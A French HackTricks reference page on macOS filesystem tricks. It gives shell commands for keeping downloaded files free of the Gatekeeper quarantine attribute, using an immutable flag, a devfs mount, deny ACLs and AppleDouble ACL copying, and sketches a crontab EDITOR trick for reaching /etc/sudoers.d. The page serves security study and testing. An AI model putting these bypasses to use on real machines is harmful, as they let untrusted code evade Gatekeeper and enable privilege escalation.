mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-25 11:25:13 +00:00
114 lines
6.8 KiB
Markdown
114 lines
6.8 KiB
Markdown
|
# Astuces pour le système de fichiers macOS
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? Ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
|
||
|
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
|
||
|
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Partagez vos astuces de piratage en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|
||
|
|
||
|
## Descripteur de fichier arbitraire
|
||
|
|
||
|
Si vous pouvez faire en sorte qu'un **processus ouvre un fichier ou un dossier avec des privilèges élevés**, vous pouvez exploiter **`crontab`** pour ouvrir un fichier dans `/etc/sudoers.d` avec **`EDITOR=exploit.py`**, de sorte que `exploit.py` obtienne le descripteur de fichier du fichier à l'intérieur de `/etc/sudoers` et l'exploite.
|
||
|
|
||
|
Par exemple : [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098)
|
||
|
|
||
|
## Astuces pour éviter les attributs xattrs de quarantaine
|
||
|
|
||
|
### Drapeau uchg
|
||
|
|
||
|
Si un fichier/dossier possède cet attribut immuable, il ne sera pas possible d'y ajouter un xattr.
|
||
|
```bash
|
||
|
echo asd > /tmp/asd
|
||
|
chflags uchg /tmp/asd
|
||
|
xattr -w com.apple.quarantine "" /tmp/asd
|
||
|
xattr: [Errno 1] Operation not permitted: '/tmp/asd'
|
||
|
|
||
|
ls -lO /tmp/asd
|
||
|
# check the "uchg" in the output
|
||
|
```
|
||
|
### Montage defvfs
|
||
|
|
||
|
Un montage **defvfs** **ne prend pas en charge les xattr**, plus d'informations dans [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)
|
||
|
```bash
|
||
|
mkdir /tmp/mnt
|
||
|
mount_devfs -o noowners none "/tmp/mnt"
|
||
|
chmod 777 /tmp/mnt
|
||
|
mkdir /tmp/mnt/lol
|
||
|
xattr -w com.apple.quarantine "" /tmp/mnt/lol
|
||
|
xattr: [Errno 1] Operation not permitted: '/tmp/mnt/lol'
|
||
|
```
|
||
|
### ACL writeextattr
|
||
|
|
||
|
Cet ACL empêche l'ajout de `xattrs` au fichier.
|
||
|
```bash
|
||
|
rm -rf /tmp/test*
|
||
|
echo test >/tmp/test
|
||
|
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test
|
||
|
ls -le /tmp/test
|
||
|
ditto -c -k test test.zip
|
||
|
# Download the zip from the browser and decompress it, the file should be without a quarantine xattr
|
||
|
|
||
|
cd /tmp
|
||
|
echo y | rm test
|
||
|
|
||
|
# Decompress it with ditto
|
||
|
ditto -x -k --rsrc test.zip .
|
||
|
ls -le /tmp/test
|
||
|
|
||
|
# Decompress it with open (if sandboxed decompressed files go to the Downloads folder)
|
||
|
open test.zip
|
||
|
sleep 1
|
||
|
ls -le /tmp/test
|
||
|
```
|
||
|
### **com.apple.acl.text xattr + AppleDouble**
|
||
|
|
||
|
Le format de fichier **AppleDouble** copie un fichier y compris ses ACEs.
|
||
|
|
||
|
Dans le [**code source**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html), il est possible de voir que la représentation textuelle ACL stockée à l'intérieur de l'xattr appelé **`com.apple.acl.text`** sera définie comme ACL dans le fichier décompressé. Ainsi, si vous compressez une application dans un fichier zip avec le format de fichier **AppleDouble** avec une ACL qui empêche l'écriture d'autres xattrs dessus... l'xattr de quarantaine ne sera pas défini dans l'application :
|
||
|
|
||
|
Consultez le [**rapport original**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/) pour plus d'informations.
|
||
|
|
||
|
Pour reproduire cela, nous devons d'abord obtenir la chaîne d'ACL correcte :
|
||
|
```bash
|
||
|
# Everything will be happening here
|
||
|
mkdir /tmp/temp_xattrs
|
||
|
cd /tmp/temp_xattrs
|
||
|
|
||
|
# Create a folder and a file with the acls and xattr
|
||
|
mkdir del
|
||
|
mkdir del/test_fold
|
||
|
echo test > del/test_fold/test_file
|
||
|
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" del/test_fold
|
||
|
chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" del/test_fold/test_file
|
||
|
ditto -c -k del test.zip
|
||
|
|
||
|
# uncomporess to get it back
|
||
|
ditto -x -k --rsrc test.zip .
|
||
|
ls -le test
|
||
|
```
|
||
|
(Notez que même si cela fonctionne, le bac à sable écrit l'attribut étendu de mise en quarantaine avant)
|
||
|
|
||
|
Pas vraiment nécessaire mais je le laisse là au cas où :
|
||
|
|
||
|
{% content-ref url="macos-xattr-acls-extra-stuff.md" %}
|
||
|
[macos-xattr-acls-extra-stuff.md](macos-xattr-acls-extra-stuff.md)
|
||
|
{% endcontent-ref %}
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
* Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
|
||
|
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
|
||
|
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Partagez vos astuces de piratage en soumettant des PR au** [**repo hacktricks**](https://github.com/carlospolop/hacktricks) **et au** [**repo hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|